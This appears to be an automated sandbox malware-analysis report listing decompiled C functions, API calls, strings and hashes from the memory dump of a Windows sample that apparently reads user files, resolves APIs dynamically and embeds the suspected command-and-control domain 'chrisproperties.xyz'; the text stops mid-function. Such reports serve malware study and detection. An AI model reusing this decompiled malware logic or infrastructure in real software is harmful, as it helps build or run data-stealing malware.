0x0041920e
0x0041921e
0x00419222
0x00419242
0x0041924b
0x0041925a
0x00419272
0x00419281
0x00419287
0x00419291
0x00419293
0x00419371
0x00419371
0x0041937c
0x0041937e
0x0041938a
0x0041938e
0x004193a5
0x004193a5
0x004193c0
0x004193c6
0x004193cd
0x004193e2
0x004193e2
0x004193eb
0x004193f5
0x004193fc
0x004193fc
0x00419402
0x00419406
0x00419425
0x00419431
0x0041944c
0x0041945a
0x0041946d
0x00419479
0x00419484
0x00419490
0x00419490
0x00419492
0x00419498
0x0041949c
0x004194b8
0x004194be
0x004194be
0x004194c4
0x004194cb
0x00000000
0x00000000
0x004194d9
0x004194d9
0x004194e7
0x004194ed
0x004194f3
0x004194f3
0x004194f3
0x00000000
0x004194f3
0x004194aa
0x00000000
0x004194aa
0x0041940e
0x00000000
0x0041940e
0x004193cf
0x00000000
0x004193cf
0x00419397
0x00419399
0x00000000
0x00000000
0x0041939b
0x00000000
0x0041939b
0x00419380
0x00000000
0x00419380
0x0041929f
0x004192a2
0x004192b0
0x004192b4
0x004192c2
0x004192c5
0x004192ce
0x004192ce
0x004192d1
0x004192d1
0x004192df
0x004192fc
0x00419301
0x00419304
0x00419306
0x00419325
0x0041932d
0x00419333
0x0041933a
0x00419346
0x00419356
0x0041935e
0x00419360
0x00000000
0x0041936c
0x00419362
0x00000000
0x00419362
0x0041933c
0x00419308
0x00419308
0x00419308
0x00000000
0x00419306
0x004192a8
0x004192aa
0x00000000
0x00000000
0x00000000
0x004192aa
0x00419224
0x00000000
0x00419224
0x00419216
0x00000000
0x00419216
0x004191a3
0x004191a7
0x00000000
0x00000000
0x004191b4
0x00000000
0x004191b4
0x0041917e
0x00419182
0x00000000
0x00000000
0x00419191
0x00419196
0x00000000
0x00419196
0x00419147
0x00418fac
0x00418fb7
0x00000000
0x00418fb7
0x00418f69
0x00418f6e
0x00000000
0x00418f6e
0x00418d3f
0x00418c1a
0x00418c1a
0x00418c1d
0x00418c23
0x00418c2c
0x00418c32
0x00418c39
0x00418c39
0x00418c42
0x00418c48
0x00418c4f
0x00418c58
0x00418c58
0x00418c5b
0x00000000
0x00418c5b
0x00418b31
0x00000000
0x00418b31
0x00418af7
0x00418b06
0x00000000
0x00418b06
0x00418ad5
0x00418ae8
0x00000000
0x00418ae8
0x00418ac5
0x00418aca
0x00000000
0x00418aca
0x00418a98
0x00418a9f
0x00418aa4
0x00418aaa
0x00418aac
0x00000000
0x00000000
0x00000000
0x00418aac
0x00418a12
0x00418a1e
0x00418a1e
0x00418a21
0x00418a27
0x00418a2f
0x00418a35
0x00418a3c
0x00418a3c
0x00418a51
0x00418a57
0x00418a5d
0x00418a65
0x00418a68
0x00000000
0x00000000
0x00418a6a
0x00000000
0x00418a6a
0x004189ad
0x00000000
0x004189ad
0x0041890f
0x00000000
0x0041890f
0x004188f7
0x00000000

Strings

U, xrefs: 00418DE2
T, xrefs: 00418DE9

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: T$U
API String ID: 0-2115836835
Opcode ID: 18092dbc252dd27ffa9615e769ff1d9d1212ef7a4eefe440ba380eb063a4a779
Instruction ID: 4f5f955fb991d278dce92fc5985d41fb36bba980f5426177948d2db208f0af64
Opcode Fuzzy Hash: 18092dbc252dd27ffa9615e769ff1d9d1212ef7a4eefe440ba380eb063a4a779
Instruction Fuzzy Hash: 8D7228B49052A98BDB24CF14C994BEEBBB2BF85304F1440DAD6096B342D7389EC5CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC40, Relevance: 9.1, APIs: 6, Instructions: 77
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041CC40(CHAR* _a4, void** _a8, long* _a12) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				intOrPtr _v24;
				long _v28;
				long _v32;
				void* _t30;
				void* _t36;
				int _t39;

				_v8 = 0;
				_v16 = 0;
				_t30 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v16 = _t30;
				if(_v16 == 0 || _v16 == 0xffffffff) {
					L12:
					return _v8;
				} else {
					_push( &_v28);
					_push(_v16);
					if( *0x43276c() != 0 && _v24 == 0) {
						 *_a12 = _v28;
						_t36 = LocalAlloc(0x40,  *_a12); // executed
						 *_a8 = _t36;
						if( *_a8 != 0) {
							_t39 = ReadFile(_v16,  *_a8,  *_a12,  &_v12, 0); // executed
							if(_t39 == 0 ||  *_a12 != _v12) {
								_v32 = 0;
							} else {
								_v32 = 1;
							}
							_v8 = _v32;
							if(_v8 == 0) {
								LocalFree( *_a8);
							}
						}
					}
					FindCloseChangeNotification(_v16); // executed
					goto L12;
				}
			}

0x0041cc46
0x0041cc4d
0x0041cc67
0x0041cc6d
0x0041cc74
0x0041cd1b
0x0041cd21
0x0041cc84
0x0041cc87
0x0041cc8b
0x0041cc94
0x0041cca2
0x0041ccac
0x0041ccb5
0x0041ccbd
0x0041ccd5
0x0041ccdd
0x0041ccf2
0x0041cce9
0x0041cce9
0x0041cce9
0x0041ccfc
0x0041cd03
0x0041cd0b
0x0041cd0b
0x0041cd03
0x0041ccbd
0x0041cd15
0x00000000
0x0041cd15

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041CC67
GetFileSizeEx.KERNEL32(000000FF,?), ref: 0041CC8C
LocalAlloc.KERNEL32(00000040,?), ref: 0041CCAC
ReadFile.KERNEL32(000000FF,?,000000FF,?,00000000), ref: 0041CCD5
LocalFree.KERNEL32 ref: 0041CD0B
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0041CD15

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: c62c7f298a1c69f85d1575dc99edec89cbbdff588b99ba0947f24c182081f3e6
Instruction ID: ec94014e0aba5c49b0ec51f71834824b71e99b3ffa1dd42a2f7eb069ed426627
Opcode Fuzzy Hash: c62c7f298a1c69f85d1575dc99edec89cbbdff588b99ba0947f24c182081f3e6
Instruction Fuzzy Hash: B931DBB4A40209EFDB14DF94DD84BEEB7B5FB48300F208169E915AB390D778AA81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00404E60, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404E60(void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v0;
				char* _v8;
				char _v20;
				void* _t26;
				signed int _t27;
				signed int _t30;
				intOrPtr* _t31;
				signed int _t33;
				void* _t34;
				intOrPtr* _t35;
				signed int _t41;
				signed int _t46;
				signed int _t52;
				signed int _t53;
				void* _t56;
				signed int _t58;
				signed int _t59;
				void* _t61;
				signed int _t64;
				void* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;

				_t65 = __esi;
				_t61 = __edi;
				while(1) {
					_t26 = E0040537B(_t56, _t61, _t65, _a4); // executed
					if(_t26 != 0) {
						break;
					}
					_t27 = E00408F17(_t26, _a4);
					__eflags = _t27;
					if(_t27 == 0) {
						__eflags =  *0x4310ec & 0x00000001;
						if(( *0x4310ec & 0x00000001) == 0) {
							 *0x4310ec =  *0x4310ec | 0x00000001;
							__eflags =  *0x4310ec;
							_push(1);
							_v8 = "bad allocation";
							E0040465A(0x4310e0,  &_v8);
							 *0x4310e0 = 0x427240;
							E00404DED( *0x4310ec, 0x42690f);
						}
						_t46 =  &_v20;
						E00404770(_t46, 0x4310e0);
						_v20 = 0x427240;
						_t30 = E00407185( &_v20, 0x42e190);
						asm("int3");
						_push(0x427240);
						_t67 = _t46;
						_t41 = 0;
						__eflags = _t67;
						if(__eflags != 0) {
							_push(0x4310e0);
							__eflags = _v0;
							if(__eflags > 0) {
								__eflags = _a8;
								 *_t67 = 0;
								__eflags = _v0 - (0 | _a8 != 0x00000000) + 1;
								if(__eflags > 0) {
									__eflags = _a4 + 0xfffffffe - 0x22;
									if(__eflags > 0) {
										goto L10;
									} else {
										_t52 = _t67;
										__eflags = _a8;
										if(_a8 != 0) {
											_t41 = 1;
											__eflags = 1;
											 *_t67 = 0x2d;
											_t52 = _t67 + 1;
											_t30 =  ~_t30;
										}
										_t64 = _t52;
										do {
											_t20 = _t30 % _a4;
											_t30 = _t30 / _a4;
											_t58 = _t20;
											__eflags = _t58 - 9;
											if(_t58 <= 9) {
												_t59 = _t58 + 0x30;
												__eflags = _t59;
											} else {
												_t59 = _t58 + 0x57;
											}
											 *_t52 = _t59;
											_t52 = _t52 + 1;
											_t41 = _t41 + 1;
											__eflags = _t30;
											if(_t30 != 0) {
												goto L22;
											}
											break;
											L22:
											__eflags = _t41 - _v0;
										} while (_t41 < _v0);
										__eflags = _t41 - _v0;
										if(__eflags < 0) {
											 *_t52 = 0;
											_t53 = _t52 - 1;
											__eflags = _t53;
											do {
												_t34 =  *_t53;
												 *_t53 =  *_t64;
												_t53 = _t53 - 1;
												 *_t64 = _t34;
												_t64 = _t64 + 1;
												__eflags = _t64 - _t53;
											} while (_t64 < _t53);
											_t33 = 0;
											__eflags = 0;
										} else {
											 *_t67 = 0;
											goto L13;
										}
									}
								} else {
									L13:
									_t31 = E00405A49(__eflags);
									_push(0x22);
									goto L11;
								}
							} else {
								L10:
								_t31 = E00405A49(__eflags);
								_push(0x16);
								L11:
								_pop(_t68);
								 *_t31 = _t68;
								E00407461();
								_t33 = _t68;
							}
						} else {
							_t35 = E00405A49(__eflags);
							_t70 = 0x16;
							 *_t35 = _t70;
							E00407461();
							_t33 = _t70;
						}
						return _t33;
					} else {
						continue;
					}
					L30:
				}
				return _t26;
				goto L30;
			}

0x00404e60
0x00404e60
0x00404e77
0x00404e7a
0x00404e82
0x00000000
0x00000000
0x00404e6d
0x00404e73
0x00404e75
0x00404e86
0x00404e97
0x00404e99
0x00404e99
0x00404ea0
0x00404ea8
0x00404eaf
0x00404eb9
0x00404ebf
0x00404ec4
0x00404ec6
0x00404ec9
0x00404ed7
0x00404eda
0x00404edf
0x00404ee6
0x00404ee7
0x00404ee9
0x00404eeb
0x00404eed
0x00404f05
0x00404f06
0x00404f09
0x00404f20
0x00404f23
0x00404f29
0x00404f2c
0x00404f3d
0x00404f40
0x00000000
0x00404f42
0x00404f42
0x00404f44
0x00404f47
0x00404f4b
0x00404f4b
0x00404f4c
0x00404f4f
0x00404f52
0x00404f52
0x00404f54
0x00404f56
0x00404f58
0x00404f58
0x00404f58
0x00404f5b
0x00404f5e
0x00404f65
0x00404f65
0x00404f60
0x00404f60
0x00404f60
0x00404f68
0x00404f6a
0x00404f6b
0x00404f6c
0x00404f6e
0x00000000
0x00000000
0x00000000
0x00404f70
0x00404f70
0x00404f70
0x00404f75
0x00404f78
0x00404f7f
0x00404f82
0x00404f82
0x00404f83
0x00404f85
0x00404f87
0x00404f89
0x00404f8a
0x00404f8c
0x00404f8d
0x00404f8d
0x00404f91
0x00404f91
0x00404f7a
0x00404f7a
0x00000000
0x00404f7a
0x00404f78
0x00404f2e
0x00404f2e
0x00404f2e
0x00404f33
0x00000000
0x00404f33
0x00404f0b
0x00404f0b
0x00404f0b
0x00404f10
0x00404f12
0x00404f12
0x00404f13
0x00404f15
0x00404f1a
0x00404f1a
0x00404eef
0x00404eef
0x00404ef6
0x00404ef7
0x00404ef9
0x00404efe
0x00404efe
0x00404f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00404e75
0x00404e85
0x00000000

APIs

_malloc.LIBCMT ref: 00404E7A

Part of subcall function 0040537B: __FF_MSGBANNER.LIBCMT ref: 00405394
Part of subcall function 0040537B: __NMSG_WRITE.LIBCMT ref: 0040539B
Part of subcall function 0040537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004046A4,00000001,00000000,?,?,?,00404702,?), ref: 004053C0

std::exception::exception.LIBCMT ref: 00404EAF
std::exception::exception.LIBCMT ref: 00404EC9
__CxxThrowException@8.LIBCMT ref: 00404EDA

Strings

bad allocation, xrefs: 00404EA8

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 615853336-2104205924
Opcode ID: 6a44664b7c32d2c544052b19ce16dc29cb26c27c40fb1a1ef70fcdf5448e00e1
Instruction ID: 9bbe11233907508109f1d33bbef5e55f2094a22d509f4e7785995bdd5fe01e58
Opcode Fuzzy Hash: 6a44664b7c32d2c544052b19ce16dc29cb26c27c40fb1a1ef70fcdf5448e00e1
Instruction Fuzzy Hash: D2F02DB1A00559A6CB04FB67DC12B6E3779BB80358F50403FF911B61E1DB7D9A418BAC

Uniqueness

Uniqueness Score: -1.00%

Function 00412CB0, Relevance: 7.7, APIs: 5, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412CB0(intOrPtr __ecx, void* _a4, long _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				CHAR* _v16;
				long _v20;
				intOrPtr _v24;
				void* _t103;

				_v24 = __ecx;
				if( *(_v24 + 4) != 0 ||  *(_v24 + 0xc) != 0 ||  *((intOrPtr*)(_v24 + 0x20)) != 0 ||  *((intOrPtr*)(_v24 + 0x18)) != 0 ||  *((intOrPtr*)(_v24 + 0x14)) != 0 || ( *(_v24 + 0x2c) & 0x000000ff) != 0) {
					return 0x1000000;
				} else {
					if(_a12 != 1) {
						if(_a12 != 2) {
							if(_a12 != 3) {
								return 0x10000;
							}
							_v20 = _a8;
							if(_v20 != 0) {
								if(_a4 == 0) {
									 *(_v24 + 0xc) = CreateFileMappingA(0xffffffff, 0, 4, 0, _v20, 0);
									if( *(_v24 + 0xc) != 0) {
										 *((intOrPtr*)(_v24 + 0x20)) = MapViewOfFile( *(_v24 + 0xc), 0xf001f, 0, 0, _v20);
										if( *((intOrPtr*)(_v24 + 0x20)) != 0) {
											L25:
											 *(_v24 + 0x1c) = 1;
											 *(_v24 + 0x24) = 0;
											 *(_v24 + 0x28) = _v20;
											return 0;
										}
										CloseHandle( *(_v24 + 0xc));
										 *(_v24 + 0xc) = 0;
										return 0x300;
									}
									return 0x300;
								}
								 *((intOrPtr*)(_v24 + 0x20)) = _a4;
								goto L25;
							}
							return 0x30000;
						}
						_v16 = _a4;
						_t103 = CreateFileA(_v16, 0x40000000, 0, 0, 2, 0x80, 0); // executed
						 *(_v24 + 4) = _t103;
						if( *(_v24 + 4) != 0xffffffff) {
							 *(_v24 + 0x1c) = 1;
							 *(_v24 + 0x10) = 0;
							 *((char*)(_v24 + 8)) = 1;
							return 0;
						}
						 *(_v24 + 4) = 0;
						return 0x200;
					}
					_v12 = _a4;
					 *(_v24 + 4) = _v12;
					 *((char*)(_v24 + 8)) = 0;
					_v8 = SetFilePointer( *(_v24 + 4), 0, 0, 1);
					 *(_v24 + 0x1c) = 0 | _v8 != 0xffffffff;
					if(( *(_v24 + 0x1c) & 0x000000ff) == 0) {
						 *(_v24 + 0x10) = 0;
					} else {
						 *(_v24 + 0x10) = _v8;
					}
					return 0;
				}
			}

0x00412cb6
0x00412cc0
0x00000000
0x00412cfb
0x00412cff
0x00412d6c
0x00412ddb
0x00000000
0x00412e99
0x00412de4
0x00412deb
0x00412dfb
0x00412e1f
0x00412e29
0x00412e4f
0x00412e59
0x00412e79
0x00412e7c
0x00412e83
0x00412e90
0x00000000
0x00412e93
0x00412e62
0x00412e6b
0x00000000
0x00412e72
0x00000000
0x00412e2b
0x00412e03
0x00000000
0x00412e03
0x00000000
0x00412ded
0x00412d71
0x00412d8a
0x00412d93
0x00412d9d
0x00412db6
0x00412dbd
0x00412dc7
0x00000000
0x00412dcb
0x00412da2
0x00000000
0x00412da9
0x00412d04
0x00412d0d
0x00412d13
0x00412d2a
0x00412d39
0x00412d45
0x00412d55
0x00412d47
0x00412d4d
0x00412d4d
0x00000000
0x00412d5c

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00412D24

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9201f6ce15df5f6a9cd88ef2443e8a01273e9c839cdc465c899d99a4fb38a6a3
Instruction ID: 9f322006b0220ea05afb56398c9dc9dfda6680702410ea0cdaf2bbb192debffe
Opcode Fuzzy Hash: 9201f6ce15df5f6a9cd88ef2443e8a01273e9c839cdc465c899d99a4fb38a6a3
Instruction Fuzzy Hash: 5C611EB4A0020ADFDB14CF54C654BAEB7B1BB44315F24825AE905BB381C3B4DE92DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041D650, Relevance: 7.6, APIs: 5, Instructions: 64
stringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041D650(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t14;
				void* _t26;
				intOrPtr _t34;
				intOrPtr _t37;
				signed int _t43;

				_t42 = __esi;
				_t41 = __edi;
				_t31 = __ebx;
				_t14 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t14 ^ _t43;
				E004091C0( &_v540, 0, 0x104);
				E004091C0( &_v276, 0, 0x104);
				E0041A380( &_v540, 0x1a); // executed
				 *0x4328c4( &_v540, _a4);
				 *0x4328c4( &_v276,  &_v540);
				_t34 =  *0x432240; // 0xc16330
				_t40 =  &_v276;
				 *0x4328c4( &_v276, _t34);
				_t26 = E0041A6E0( &_v276); // executed
				if(_t26 != 0) {
					_t37 =  *0x432570; // 0xc114b0
					if(E0041C690(__ebx, __edi, __esi, _t37) != 0) {
						_t40 = _a8;
						E0041D360(__ebx, __edi, __esi, 0x42945d,  &_v540, _a8);
					}
					_t26 = E0041C650();
				}
				return E00404354(_t26, _t31, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x0041d650
0x0041d650
0x0041d650
0x0041d659
0x0041d660
0x0041d671
0x0041d687
0x0041d698
0x0041d6ab
0x0041d6bf
0x0041d6c5
0x0041d6cc
0x0041d6d3
0x0041d6e0
0x0041d6ea
0x0041d6ec
0x0041d6fd
0x0041d6ff
0x0041d70f
0x0041d714
0x0041d717
0x0041d717
0x0041d729

APIs

_memset.LIBCMT ref: 0041D671
_memset.LIBCMT ref: 0041D687

Part of subcall function 0041A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0041A39D

lstrcat.KERNEL32(?,?), ref: 0041D6AB
lstrcat.KERNEL32(?,?), ref: 0041D6BF
lstrcat.KERNEL32(?,00C16330), ref: 0041D6D3

Part of subcall function 0041A6E0: GetFileAttributesA.KERNEL32(?), ref: 0041A6EA

Part of subcall function 0041C690: __wgetenv.LIBCMT ref: 0041C6A6
Part of subcall function 0041C690: LoadLibraryA.KERNEL32(00C115C0), ref: 0041C708
Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,00C159E8), ref: 0041C72D
Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,00C159D0), ref: 0041C746
Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,00C165D0), ref: 0041C75E
Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,00C15970), ref: 0041C776
Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,00C162F0), ref: 0041C78F
Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,00C15988), ref: 0041C7A7

Part of subcall function 0041D360: wsprintfA.USER32 ref: 0041D385
Part of subcall function 0041D360: FindFirstFileA.KERNEL32(?,?), ref: 0041D39C

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$lstrcat$File_memset$AttributesFindFirstFolderLibraryLoadPath__wgetenvwsprintf
String ID:
API String ID: 1612030115-0
Opcode ID: e388588dc243cc71f73e8d93367709d7acdf1f86ee30b6db14fbab7ecf610c90
Instruction ID: 49756a93a91f06ebf003bdda9be0c0177cda1d93663878ce3007f740a3bf9368
Opcode Fuzzy Hash: e388588dc243cc71f73e8d93367709d7acdf1f86ee30b6db14fbab7ecf610c90
Instruction Fuzzy Hash: 9511DDF6E4010CA7CB14EBA0DC86FDE7378AB18304F0406ADBA0957181EA74DBC4CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFE0, Relevance: 7.5, APIs: 5, Instructions: 46
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041AFE0(intOrPtr __ebx, CHAR* __edx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				struct _TIME_ZONE_INFORMATION _v188;
				void* _v192;
				long _v196;
				signed int _t17;
				long _t23;
				CHAR* _t29;
				intOrPtr _t31;
				CHAR* _t36;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;

				_t39 = __esi;
				_t38 = __edi;
				_t36 = __edx;
				_t31 = __ebx;
				_t17 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t17 ^ _t40;
				_v192 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				_v188.Bias = 0;
				E004091C0( &(_v188.StandardName), 0, 0xa8);
				_t23 = GetTimeZoneInformation( &_v188); // executed
				_v196 = _t23;
				if(_v196 != 0xffffffff) {
					asm("cdq");
					_t36 =  *0x4324cc; // 0xc166d8
					wsprintfA(_v192, _t36,  ~(_v188.Bias) / 0x3c);
					_t29 = _v192;
				} else {
					_t29 = _v192;
				}
				return E00404354(_t29, _t31, _v8 ^ _t40, _t36, _t38, _t39);
			}

0x0041afe0
0x0041afe0
0x0041afe0
0x0041afe0
0x0041afe9
0x0041aff0
0x0041b007
0x0041b00d
0x0041b025
0x0041b034
0x0041b03a
0x0041b047
0x0041b059
0x0041b062
0x0041b070
0x0041b079
0x0041b049
0x0041b049
0x0041b049
0x0041b08c

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0041AFFA
HeapAlloc.KERNEL32(00000000), ref: 0041B001
_memset.LIBCMT ref: 0041B025
GetTimeZoneInformation.KERNEL32(00000000), ref: 0041B034
wsprintfA.USER32 ref: 0041B070

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZone_memsetwsprintf
String ID:
API String ID: 3962126076-0
Opcode ID: f04ae1eec3cd3d8f71b6e0b8e1ba63e6537d3239d06e5d4a1eda5fe36536eada
Instruction ID: a38f8acdfa9d2068cb0a8f8de2786d5a5190629af5dbd92f4f3d6e32fc3f7771
Opcode Fuzzy Hash: f04ae1eec3cd3d8f71b6e0b8e1ba63e6537d3239d06e5d4a1eda5fe36536eada
Instruction Fuzzy Hash: F0116170A00318DBEB54EF64DD49F99B7B9EB08304F0042A9E909E7291DB749E88CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00422F70, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00422F70(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, char _a4) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				char _v104;
				void* _v108;
				void* _v112;
				signed int _t27;
				intOrPtr _t30;
				long _t36;
				void* _t38;
				void* _t39;
				signed int _t65;

				_push(0xffffffff);
				_push(E0042658C);
				_push( *[fs:0x0]);
				_t27 =  *0x4301f4; // 0x3b2bc12f
				_v20 = _t27 ^ _t65;
				 *[fs:0x0] =  &_v16;
				_t30 =  *0x432354; // 0x42a074
				E004011C0( &_v104, _t30); // executed
				_v8 = 0;
				_t5 =  &_a4; // 0x42307d
				E004011C0( &_v48,  *_t5);
				_v8 = 1;
				E00422D00(__ebx, __edi, __esi,  &_v76,  &_v48); // executed
				_v8 = 3;
				E004012D0( &_v48);
				_t36 = E00401350( &_v76);
				_t38 = RtlAllocateHeap(GetProcessHeap(), 0, _t36); // executed
				_v108 = _t38;
				_t39 = E00401330( &_v104);
				E00422980(__ebx, E00401330( &_v76), _t39,  &_v108); // executed
				_v112 = _v108;
				_v8 = 0;
				E004012D0( &_v76);
				_v8 = 0xffffffff;
				E004012D0( &_v104);
				 *[fs:0x0] = _v16;
				return E00404354(_v112, __ebx, _v20 ^ _t65, _v108, __edi, __esi, _t27 ^ _t65);
			}

0x00422f73
0x00422f75
0x00422f80
0x00422f84
0x00422f8b
0x00422f92
0x00422f98
0x00422fa1
0x00422fa6
0x00422fad
0x00422fb4
0x00422fb9
0x00422fc5
0x00422fcd
0x00422fd4
0x00422fdc
0x00422feb
0x00422ff1
0x00422ffb
0x0042300a
0x00423015
0x00423018
0x0042301f
0x00423024
0x0042302e
0x00423039
0x0042304e

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,3B2BC12F), ref: 00422FE4
RtlAllocateHeap.NTDLL(00000000,?,3B2BC12F), ref: 00422FEB

Strings

chrisproperties.xyz, xrefs: 00422F80
}0B, xrefs: 00422FAD, 00422FB0

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID: chrisproperties.xyz$}0B
API String ID: 1357844191-1224519941
Opcode ID: 76a1a9754337881a8685aedcb8487fecfc12b9da713792be4f5337c78b4039f5
Instruction ID: b6d434c4cba67818d2f1409031ea5769ef2511f09741796fe981391f882f5437
Opcode Fuzzy Hash: 76a1a9754337881a8685aedcb8487fecfc12b9da713792be4f5337c78b4039f5
Instruction Fuzzy Hash: F1213D71D00208EBCB09EBA5D951BDEB7B8EF14304F50426EF416B72E1DB386A08CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00421620, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00421620(intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _t36;

				_v12 = __ecx;
				E004091C0(_v12, 0, 0x148);
				 *((intOrPtr*)(_v12 + 0xc)) = _a4;
				E0040512D(_v12 + 0x10, 0x14, "1BEF0A57BE110FD467A");
				 *((intOrPtr*)(_v12 + 4)) = 0x7a120;
				_push( *((intOrPtr*)(_v12 + 4))); // executed
				_t36 = E00404349(__edi, __esi, _v12 + 0x10); // executed
				_v8 = _t36;
				 *_v12 = _v8;
				E004091C0( *_v12, 0,  *((intOrPtr*)(_v12 + 4)));
				 *((intOrPtr*)(_v12 + 0x24)) = _a8;
				 *((intOrPtr*)(_v12 + 0x38)) = _a12;
				 *((intOrPtr*)(_v12 + 0x3c)) = _a16;
				 *((intOrPtr*)(_v12 + 0x40)) = _a20;
				return _v12;
			}

0x00421626
0x00421634
0x00421642
0x00421653
0x0042165e
0x0042166b
0x0042166c
0x00421674
0x0042167d
0x0042168e
0x0042169c
0x004216a5
0x004216ae
0x004216b7
0x004216c0

APIs

_memset.LIBCMT ref: 00421634
_strcpy_s.LIBCMT ref: 00421653
_memset.LIBCMT ref: 0042168E

Strings

1BEF0A57BE110FD467A, xrefs: 00421645

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$_strcpy_s
String ID: 1BEF0A57BE110FD467A
API String ID: 1261871945-2910601657
Opcode ID: d87fe8be99c91be2f0ec4594f2017e1b0badc189c50b59529de3995b92fdd1c8
Instruction ID: 2172e71b973282a083bc5586dc99c640534b7d7a8ff33a094392bb0c867027d6
Opcode Fuzzy Hash: d87fe8be99c91be2f0ec4594f2017e1b0badc189c50b59529de3995b92fdd1c8
Instruction Fuzzy Hash: 5521BDB8E00208AFDB04DF95D48599EBBB5EF88314F1081A9E944AB381D675EE51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00424F00, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 269
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00424F00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t11;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t89;
